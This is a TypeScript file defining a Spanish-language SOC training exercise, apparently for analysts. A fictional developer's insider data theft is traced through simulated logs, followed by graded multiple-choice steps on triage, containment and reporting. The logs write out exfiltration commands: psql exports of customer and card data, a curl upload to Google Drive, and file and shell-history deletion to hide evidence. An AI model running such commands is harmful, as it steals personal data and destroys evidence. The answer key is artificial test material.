import type { Scenario } from "./types";

const scenario: Scenario = {
  id: "insider-threat",
  title: "Amenaza interna — exfiltración de datos",
  severity: "high",
  description: "DLP detectó subida de archivos sensibles a un servicio cloud personal. Zeek HTTP y auditoría de base de datos confirman que Lucía Fernández (Desarrolladora Backend) está extrayendo datos de clientes de la base de datos y subiéndolos a su cuenta personal de Google Drive.",
  alertSource: "DLP + Zeek HTTP + DB Audit",
  alertTime: "2026-08-24 18:45:00 UTC",
  logs: [
    { line: 1, timestamp: "Aug 24 17:00:05", source: "srv-web-01 nginx.access", message: "GET /api/health 200 — 10.10.2.44 — Lucía Fernández Dev", severity: "info", flagged: false },
    { line: 2, timestamp: "Aug 24 17:01:10", source: "srv-db-01 sshd[1801]", message: "Accepted publickey for lucia from 10.10.2.44 port 50601 ssh2", severity: "info", flagged: false },
    { line: 3, timestamp: "Aug 24 17:02:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db", severity: "info", flagged: false },
    { line: 4, timestamp: "Aug 24 17:03:15", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 12% — RAM 45% — Disk 65%", severity: "info", flagged: false },
    { line: 5, timestamp: "Aug 24 17:04:00", source: "srv-web-01 node.app", message: "Queue processor: 167 jobs completed, 23 pending", severity: "info", flagged: false },
    { line: 6, timestamp: "Aug 24 17:05:30", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 201 — 10.10.3.10 — Sofía Ramírez Ops", severity: "info", flagged: false },
    { line: 7, timestamp: "Aug 24 17:06:00", source: "srv-monitor cron", message: "Metric aggregation: 8,934 events — avg latency 13ms", severity: "info", flagged: false },
    { line: 8, timestamp: "Aug 24 17:07:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT * FROM customers LIMIT 1000'", severity: "info", flagged: false },
    { line: 9, timestamp: "Aug 24 17:08:00", source: "srv-web-01 sshd[22801]", message: "Accepted publickey for martin from 10.10.1.15 port 50701 ssh2", severity: "info", flagged: false },
    { line: 10, timestamp: "Aug 24 17:09:30", source: "srv-web-01 nginx.access", message: "GET /api/orders/history 200 — 10.10.3.22 — Carlos Ruiz Corp", severity: "info", flagged: false },
    { line: 11, timestamp: "Aug 24 17:10:00", source: "srv-monitor cron", message: "Health check: srv-web-01 — CPU 20% — RAM 48% — Disk 61%", severity: "info", flagged: false },
    { line: 12, timestamp: "Aug 24 17:11:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT customer_id, name, email, phone, credit_card_last4, address FROM customers) TO '/tmp/customer_export.csv' WITH CSV HEADER'", severity: "warning", flagged: true },
    { line: 13, timestamp: "Aug 24 17:12:00", source: "srv-web-01 node.app", message: "SSL certificate renewal check — expires in 18 days", severity: "info", flagged: false },
    { line: 14, timestamp: "Aug 24 17:13:30", source: "srv-web-01 nginx.access", message: "GET /dashboard 200 — 10.10.1.20 — Diego López SOC", severity: "info", flagged: false },
    { line: 15, timestamp: "Aug 24 17:14:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT order_id, customer_id, amount, payment_method, card_number FROM orders WHERE year=2026'", severity: "warning", flagged: true },
    { line: 16, timestamp: "Aug 24 17:15:10", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=203.0.113.77 DST=10.10.1.10 PROTO=TCP SPT=4444 DPT=22", severity: "info", flagged: false },
    { line: 17, timestamp: "Aug 24 17:16:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT o.order_id, o.customer_id, c.name, c.email, c.credit_card_last4, o.amount FROM orders o JOIN customers c ON o.customer_id=c.customer_id WHERE o.year=2026) TO '/tmp/orders_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 18, timestamp: "Aug 24 17:17:30", source: "srv-web-01 nginx.access", message: "POST /api/auth/login 200 — 10.10.2.44 — Lucía Fernández", severity: "info", flagged: false },
    { line: 19, timestamp: "Aug 24 17:18:00", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 28% — RAM 52% — Disk 66%", severity: "info", flagged: false },
    { line: 20, timestamp: "Aug 24 17:19:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'ls -la /tmp/*.csv'", severity: "info", flagged: false },
    { line: 21, timestamp: "Aug 24 17:20:00", source: "srv-web-01 node.app", message: "Queue processor: 154 jobs completed, 18 pending", severity: "info", flagged: false },
    { line: 22, timestamp: "Aug 24 17:21:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/customer_data_2026.tar.gz /tmp/customer_export.csv /tmp/orders_export.csv'", severity: "critical", flagged: true },
    { line: 23, timestamp: "Aug 24 17:22:00", source: "srv-web-01 sshd[22810]", message: "Accepted publickey for diego from 10.10.1.20 port 50801 ssh2", severity: "info", flagged: false },
    { line: 24, timestamp: "Aug 24 17:23:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'curl -s -F file=@/tmp/customer_data_2026.tar.gz https://drive.google.com/upload —oauth2-access-token ya29.a0AfH6SMB...'", severity: "critical", flagged: true },
    { line: 25, timestamp: "Aug 24 17:24:00", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 2.4MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 26, timestamp: "Aug 24 17:25:10", source: "srv-web-01 nginx.access", message: "GET /api/products?page=1 200 — 10.10.3.10 — Sofía Ramírez Ops", severity: "info", flagged: false },
    { line: 27, timestamp: "Aug 24 17:26:00", source: "srv-monitor cron", message: "Metric aggregation: 9,201 events — avg latency 12ms", severity: "info", flagged: false },
    { line: 28, timestamp: "Aug 24 17:27:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/customer_export.csv /tmp/orders_export.csv /tmp/customer_data_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 29, timestamp: "Aug 24 17:28:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT * FROM payment_tokens WHERE active=true LIMIT 500'", severity: "critical", flagged: true },
    { line: 30, timestamp: "Aug 24 17:29:15", source: "srv-web-01 nginx.access", message: "POST /api/reports/generate 202 — 10.10.1.15 — Martin Gonzalez Admin", severity: "info", flagged: false },
    { line: 31, timestamp: "Aug 24 17:30:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT token_id, customer_id, card_number, expiry_date, cvv FROM payment_tokens WHERE active=true) TO '/tmp/tokens_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 32, timestamp: "Aug 24 17:31:00", source: "srv-web-01 node.app", message: "Cache hit ratio: 92.1% — Redis memory: 301MB/512MB", severity: "info", flagged: false },
    { line: 33, timestamp: "Aug 24 17:32:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/payment_tokens_2026.tar.gz /tmp/tokens_export.csv'", severity: "critical", flagged: true },
    { line: 34, timestamp: "Aug 24 17:33:00", source: "srv-monitor cron", message: "Health check: srv-app-01 — CPU 38% — RAM 56% — Disk 70%", severity: "info", flagged: false },
    { line: 35, timestamp: "Aug 24 17:34:15", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 1.8MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 36, timestamp: "Aug 24 17:35:00", source: "srv-web-01 sshd[22820]", message: "Accepted publickey for sofia from 10.10.3.10 port 50901 ssh2", severity: "info", flagged: false },
    { line: 37, timestamp: "Aug 24 17:36:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/tokens_export.csv /tmp/payment_tokens_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 38, timestamp: "Aug 24 17:37:00", source: "srv-web-01 nginx.access", message: "GET /api/health 200 — 10.10.1.20 — Diego López SOC", severity: "info", flagged: false },
    { line: 39, timestamp: "Aug 24 17:38:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT setting_value FROM system_config WHERE setting_name IN ('api_key_stripe','api_key_sendgrid','smtp_password')'", severity: "critical", flagged: true },
    { line: 40, timestamp: "Aug 24 17:39:00", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 18% — RAM 48% — Disk 65%", severity: "info", flagged: false },
    { line: 41, timestamp: "Aug 24 17:40:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT * FROM system_config WHERE setting_name IN ('api_key_stripe','api_key_sendgrid','smtp_password')) TO '/tmp/secrets_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 42, timestamp: "Aug 24 17:41:00", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 200 — 10.10.3.22 — Carlos Ruiz Corp", severity: "info", flagged: false },
    { line: 43, timestamp: "Aug 24 17:42:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/secrets_2026.tar.gz /tmp/secrets_export.csv'", severity: "critical", flagged: true },
    { line: 44, timestamp: "Aug 24 17:43:00", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 0.3MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 45, timestamp: "Aug 24 17:44:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/secrets_export.csv /tmp/secrets_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 46, timestamp: "Aug 24 17:45:00", source: "srv-web-01 node.app", message: "Queue processor: 178 jobs completed, 25 pending", severity: "info", flagged: false },
    { line: 47, timestamp: "Aug 24 17:46:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'history -c && rm /root/.bash_history'", severity: "critical", flagged: true },
    { line: 48, timestamp: "Aug 24 17:47:00", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=192.0.2.55 DST=10.10.1.10 PROTO=TCP SPT=3389 DPT=3389", severity: "info", flagged: false },
    { line: 49, timestamp: "Aug 24 17:48:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT count(*) FROM customers'", severity: "info", flagged: false },
    { line: 50, timestamp: "Aug 24 17:49:00", source: "srv-web-01 sshd[22830]", message: "Accepted publickey for carlos from 10.10.3.22 port 51001 ssh2", severity: "info", flagged: false },
    { line: 51, timestamp: "Aug 24 17:50:15", source: "srv-monitor cron", message: "DLP alert: 3 files uploaded to personal cloud storage from srv-db-01 — total 4.5MB — user: lucia", severity: "critical", flagged: true },
    { line: 52, timestamp: "Aug 24 17:51:00", source: "srv-db-01 zeek.http", message: "GET https://drive.google.com/drive/my-drive — 10.10.2.44 — 200 OK", severity: "warning", flagged: true },
    { line: 53, timestamp: "Aug 24 17:52:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'DROP TABLE temp_export'", severity: "info", flagged: false },
    { line: 54, timestamp: "Aug 24 18:45:00", source: "srv-monitor alert", message: "DLP violation confirmed: Lucía Fernández uploaded customer PII + payment tokens + API secrets to personal Google Drive (3 uploads totaling 4.5MB)", severity: "critical", flagged: true },
    { line: 55, timestamp: "Aug 24 18:45:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=exit", severity: "info", flagged: false },
  ],
  playbook: [],
  steps: [
    {
      id: "identify",
      title: "Paso 1 — Identificar los logs relevantes",
      description: "Revisá el log completo. ¿Qué líneas son parte de la amenaza interna?",
      hint: "Mirá las queries SQL, las subidas a Google Drive, y la eliminación de evidencia.",
      options: [
        {
          id: "a",
          label: "Solo las queries SQL de Lucía (líneas 8, 12, 15, 17, 22, 28, 31, 39, 41) — eso muestra qué extrajo",
          correct: false,
          explanation: "Las queries muestran qué datos se extrajeron, pero sin las subidas a Google Drive (líneas 24, 35, 44) y la eliminación de evidencia (líneas 28, 37, 45, 47) no puedes probar que la exfiltración se completó.",
          consequence: "En un SOC real, reportar solo las queries SQL sin la evidencia de subida a Google Drive impide probar que los datos abandonaron la red corporativa, lo cual es crítico para notificación regulatoria.",
        },
        {
          id: "b",
          label: "Solo las subidas a Google Drive y la alerta DLP (líneas 24, 35, 44, 51, 54)",
          correct: false,
          explanation: "Las subidas muestran que los datos salieron, pero sin las queries SQL no sabés qué datos específicos se robaron. La notificación regulatoria requiere saber exactamente qué registros de clientes fueron comprometidos.",
          consequence: "En un SOC real, reportar subidas a Google Drive sin documentar qué datos específicos se extrajeron impide a Legal determinar la obligación de notificación a clientes cuyos datos de tarjetas de crédito fueron comprometidos.",
        },
        {
          id: "c",
          label: "Todas las líneas del log (1-55) para tener contexto completo de la actividad de Lucía",
          correct: false,
          explanation: "Las líneas normales incluyen health checks, activity de otros usuarios (Sofía, Carlos, Martin, Diego), y tráfico legítimo. Incluir 30+ líneas irrelevantes dificulta el análisis forense y confunde al equipo de contención.",
          consequence: "En un SOC real, entregar 55 líneas de evidencia donde 30 son tráfico legítimo hace que el equipo de contención pierda horas investigando usuarios inocentes mientras la exfiltración sigue activa.",
        },
        {
          id: "d",
          label: "Líneas 12-13, 15, 17, 22, 24-25, 28-31, 33, 35, 37, 39, 41, 43-45, 47, 51-54 (cadena completa)",
          correct: true,
          explanation: "Correcto. La secuencia es: queries SQL de extracción (SELECT de customers, orders, payment_tokens, secrets) -> export a CSV -> compresión -> subida a Google Drive -> eliminación de archivos -> limpieza de historial. Todo es parte del mismo incidente.",
        },
      ],
    },
    {
      id: "assign",
      title: "Paso 2 — Asignar el incidente",
      description: "¿Quién debería tomar este caso? Una empleada está exfiltrando datos de clientes.",
      hint: "Considerá que esto es amenaza interna con exfiltración de datos regulatorios.",
      options: [
        {
          id: "a",
          label: "El equipo de Compliance — que verifiquen si hay obligaciones de notificación regulatoria",
          correct: false,
          explanation: "Compliance es importante pero no ejecuta contención técnica. La exfiltración está activa AHORA y necesita cortarse inmediatamente. Compliance se involucra después para determinar obligaciones de notificación.",
          consequence: "En un SOC real, escalar primero a Compliance sin contener la exfiltración permite que Lucía siga subiendo datos a Google Drive mientras el equipo debate obligaciones regulatorias.",
        },
        {
          id: "b",
          label: "Diego López (SOC L2) para investigación + Ana Martínez (DevOps) para contención técnica",
          correct: false,
          explanation: "Aunque Diego y Ana pueden manejar la investigación y contención técnica, una amenaza interna con datos de clientes comprometidos requiere escalamiento inmediato a Legal y CISO por implicaciones regulatorias. Falta el componente legal.",
          consequence: "En un SOC real, manejar una amenaza interna solo a nivel técnico sin escalar a Legal puede resultar en incumplimiento de obligaciones de notificación regulatoria y exposición legal para la empresa.",
        },
        {
          id: "c",
          label: "Diego López (SOC L2) + Ana Martínez (DevOps) + escalamiento a CISO y Legal por amenaza interna",
          correct: true,
          explanation: "Correcto. Amenaza interna con exfiltración de datos de clientes requiere: investigación (Diego), contención técnica (Ana — desactivar cuenta, revocar access), y escalamiento inmediato a CISO y Legal por implicaciones regulatorias.",
        },
        {
          id: "d",
          label: "Sofía Ramírez (Gerente de Operaciones) — que decida si Lucía debe ser despedida inmediatamente",
          correct: false,
          explanation: "La decisión de despido es una acción de RRHH, no de contención de seguridad. Primero se contiene el incidente, se preserva la evidencia, y luego RRHH toma decisiones administrativas. Además, un despido precipitado puede destruir evidencia.",
          consequence: "En un SOC real, priorizar decisiones de RRHH sobre la contención de seguridad permite que la exfiltración continúe mientras se debate el futuro laboral del sospechoso. La contención técnica es prioridad.",
        },
      ],
    },
    {
      id: "playbook",
      title: "Paso 3 — Consultar el playbook",
      description: "El playbook está vacío. ¿Cuál es la PRIMERA acción de contención para una amenaza interna con exfiltración activa?",
      hint: "Pensá en cortar el acceso de la persona mientras preservas la evidencia.",
      options: [
        {
          id: "a",
          label: "Desactivar la cuenta de Lucía, revocar acceso SSH a srv-db-01, bloquear subidas a Google Drive desde la red corporativa, y preservar evidencia forense",
          correct: true,
          explanation: "Correcto. La contención de amenaza interna requiere: 1) desactivar cuenta para cortar acceso, 2) revocar SSH, 3) bloquear exfiltración a cloud, 4) preservar logs como evidencia. En ese orden.",
        },
        {
          id: "b",
          label: "Solicitar una orden judicial para acceder al Google Drive personal de Lucía antes de contener",
          correct: false,
          explanation: "Las órdenes judiciales toman días o semanas. La exfiltración está activa AHORA y necesita contención inmediata. La preservación de evidencia interna (logs, audits) es suficiente para contener mientras se gestiona el proceso legal.",
          consequence: "En un SOC real, esperar procesos legales antes de contener una exfiltración activa permite que Lucía siga subiendo datos a Google Drive durante todo el proceso judicial, ampliando el daño exponencialmente.",
        },
        {
          id: "c",
          label: "Desactivar temporalmente el acceso a Google Drive en todo el servidor de base de datos",
          correct: false,
          explanation: "Bloquear Google Drive en todo el servidor afecta a todos los usuarios, no solo a Lucía. La contención debe ser quirúrgica: desactivar la cuenta de Lucía y bloquear su IP, no afectar a todo el equipo.",
          consequence: "En un SOC real, bloquear servicios cloud en todo un servidor por la acción de un empleado afecta la productividad de todo el equipo y genera alertas innecesarias que distraen del incidente real.",
        },
        {
          id: "d",
          label: "Hablar con Lucía primero para entender por qué está subiendo archivos antes de tomar medidas",
          correct: false,
          explanation: "Confrontar al sospechoso sin contención previa permite que destruya evidencia, alerte a cómplices, o continúe la exfiltración mientras explica su situación. La contención siempre precede a la confrontación.",
          consequence: "En un SOC real, confrontar a un insider sin contención previa es el error más común. El sospechoso puede borrar logs, destruir evidencia, o subir más datos mientras conversás sobre sus motivaciones.",
        },
      ],
    },
    {
      id: "classify",
      title: "Paso 4 — Clasificar la alerta",
      description: "¿Cuál es la clasificación correcta de este incidente?",
      hint: "Considerá: extracción intencional de datos, subida a cloud personal, eliminación de evidencia.",
      options: [
        {
          id: "a",
          label: "Positivo falso — Lucía es una empleada de confianza que probablemente está haciendo una copia de seguridad autorizada",
          correct: false,
          explanation: "Las copias de seguridad autorizadas se hacen a destinos corporativos, no a Google Drive personal. Además, Lucía extrajo datos de clientes y tokens de pago que están fuera del alcance de sus responsabilidades de desarrollo.",
          consequence: "En un SOC real, clasificar exfiltración intencional como copia de seguridad autorizada basándose en la 'confianza' del empleado ignora que hay datos de clientes comprometidos que requieren notificación regulatoria.",
        },
        {
          id: "b",
          label: "Positivo verdadero — Amenaza interna con exfiltración intencional de datos de clientes",
          correct: true,
          explanation: "Correcto. La evidencia es clara: extracción selectiva de datos sensibles (customers, payment_tokens, API secrets) + subida a Google Drive personal + eliminación de archivos + limpieza de historial. Esto es exfiltración intencional.",
        },
        {
          id: "c",
          label: "Requiere investigación — puede ser un error de configuración o una tarea asignada que no quedó documentada",
          correct: false,
          explanation: "Un error de configuración no ejecuta queries SQL SELECT específicas de campos sensibles, no comprime archivos, no los sube a Google Drive con OAuth2 token personal, y no elimina evidencia con 'rm' y 'history -c'. Cada paso fue intencional.",
          consequence: "En un SOC real, clasificar exfiltración intencional como error de configuración retrasa la notificación regulatoria y permite que el sospechoso siga operando libremente con acceso a datos sensibles.",
        },
        {
          id: "d",
          label: "Requiere más análisis — necesitamos revisar el contenido de los archivos subidos antes de clasificar",
          correct: false,
          explanation: "La evidencia de las queries SQL ya muestra exactamente qué datos se extrajeron: customer_id, name, email, credit_card_last4, card_number, cvv, y API keys. No necesitás revisar los archivos para clasificar el incidente.",
          consequence: "En un SOC real, pedir revisión de archivos subidos cuando las queries SQL ya documentan la exfiltración retrasa la contención y la notificación regulatoria innecesariamente.",
        },
      ],
    },
    {
      id: "writeup",
      title: "Paso 5 — Redacción del reporte",
      description: "Escribí el reporte del incidente. Este es un caso de amenaza interna con implicaciones legales.",
      hint: "Incluí: quién, qué datos, cómo, cuánto, y acciones ejecutadas.",
      options: [
        {
          id: "a",
          label: "Una empleada subió archivos a su nube personal. Hay que revisar el policy.",
          correct: false,
          explanation: "Demasiado vago. No menciona qué datos específicos se robaron, cuántos registros, qué servidores, ni las acciones de contención ejecutadas. Un reporte así no permite determinar obligaciones de notificación regulatoria.",
          consequence: "En un SOC real, un reporte así no permite a Legal determinar si hay obligación de notificación regulatoria. Sin saber qué datos se robaron, no puedes notificar a los clientes afectados.",
        },
        {
          id: "b",
          label: "Amenaza interna — Lucía extrajo datos de clientes. Se desactivó su cuenta y se escaló a Legal.",
          correct: false,
          explanation: "Incluye la acción ejecutada pero carece de datos forenses críticos: qué campos específicos se extrajeron (credit_card_last4, cvv, API keys), cuántos registros, volumen de datos, y timeline completo. Sin esto, Legal no puede evaluar la gravedad.",
          consequence: "En un SOC real, un reporte sin detalles de los datos comprometidos impide a Legal determinar si la notificación regulatoria es obligatoria y a qué autoridades reportar.",
        },
        {
          id: "c",
          label: "Lucía robó datos de tarjetas de crédito y los subió a su Google Drive. Hay que despedirla urgentemente.",
          correct: false,
          explanation: "Lenguaje informal con terminología incorrecta. 'Robó datos de tarjetas de crédito' es impreciso (extrajo datos de clientes, orders, payment_tokens, y API secrets). El despido es acción de RRHH, no del reporte SOC. No hay timeline, volumen, ni acciones técnicas documentadas.",
          consequence: "En un SOC real, un reporte informal sin datos técnicos precisos puede ser inadmisible como evidencia legal y no permite a otros equipos ejecutar remediación específica.",
        },
        {
          id: "d",
          label: "Amenaza interna confirmada — Lucía Fernández (Desarrolladora Backend, 10.10.2.44) extrajo datos de clientes de production_db (srv-db-01) entre 17:00-17:50 UTC. Datos extraídos: customers (customer_id, name, email, phone, credit_card_last4, address), orders (order_id, amount, payment_method, card_number), payment_tokens (token_id, card_number, expiry_date, cvv), y system secrets (api_key_stripe, api_key_sendgrid). Total: ~4.5MB subidos a Google Drive personal en 3 uploads. Evidencia de eliminación de archivos y limpieza de historial. Cuenta desactivada, SSH revocado, DLP actualizado. Impacto: datos de clientes de pagos comprometidos — notificación regulatoria requerida.",
          correct: true,
          explanation: "Reporte completo de amenaza interna: QUIÉN (Lucía), QUÉ DATOS (customers, orders, payment_tokens, secrets), CÓMO (psql queries + curl a Google Drive), CUÁNDO (17:00-17:50), CUÁNTO (4.5MB), EVIDENCIA DE DESTRUCCIÓN (rm + history -c), CONTENCIÓN, e IMPACTO REGULATORIO. Formato profesional SOC.",
        },
      ],
    },
    {
      id: "return",
      title: "Paso 6 — Volver al panel",
      description: "Incidente documentado y escalado. ¿Qué sigue en tu flujo de trabajo?",
      hint: "Pensá en amenaza interna con implicaciones legales y regulatorias.",
      options: [
        {
          id: "a",
          label: "Cerrar el caso — ya está todo documentado y la cuenta fue desactivada",
          correct: false,
          explanation: "Un caso de amenaza interna con datos de clientes comprometidos no se cierra sin: verificación de preservación de evidencia forense completa, notificación a Legal, coordinación con DPO para notificación regulatoria, y revisión de acceso de otros usuarios que pudieran estar involucrados.",
          consequence: "En un SOC real, cerrar un caso de amenaza interna sin verificar la preservación de evidencia puede arruinar un caso legal contra el empleado y exponer a la empresa a multas regulatorias por notificación extemporánea.",
        },
        {
          id: "b",
          label: "Enviar un comunicado a toda la empresa sobre la política de uso de nube personal",
          correct: false,
          explanation: "Las comunicaciones de políticas son preventivas, no parte del flujo de respuesta a incidentes. Ahora mismo necesitás monitorear si hay más empleados exfiltrando datos, no enviar recordatorios de políticas.",
          consequence: "En un SOC real, priorizar comunicaciones de políticas sobre la vigilancia continua permite que otros empleados comprometidos sigan exfiltrando datos mientras el equipo redacta emails internos.",
        },
        {
          id: "c",
          label: "Volver al panel de logs para monitorear si hay más activity sospechosa de otros empleados mientras Legal y DPO ejecutan sus protocolos",
          correct: true,
          explanation: "Correcto. Tu rol es vigilancia continua: ¿hay otros empleados exfiltrando datos? ¿el atacante tiene cómplices? ¿hay más exfiltración en curso? Mientras Legal ejecuta, vos monitoreás.",
        },
        {
          id: "d",
          label: "Programar una reunión con el equipo de RRHH para discutir procedimientos de despido",
          correct: false,
          explanation: "Las reuniones de RRHH no son parte del flujo de trabajo inmediato del SOC. Tu prioridad es monitorear la red para detectar si hay otros puntos de acceso comprometidos mientras la contención se ejecuta.",
          consequence: "En un SOC real, enfocarse en procedimientos de RRHH mientras la amenaza interna podría estar activa en otros empleados distrae al analista de detectar movimientos laterales del atacante.",
        },
      ],
    },
  ],
  summary: "Amenaza interna confirmada — Lucía Fernández extrajo datos de clientes de production_db (customers, orders, payment_tokens, API secrets) y los subió a Google Drive personal. ~4.5MB de datos sensibles exfiltrados entre 17:00-17:50 UTC. Evidencia de eliminación de archivos y limpieza de historial. Clasificación: POSITIVO VERDADERO — Exfiltración intencional de datos con implicaciones regulatorias.",
};

export default scenario;
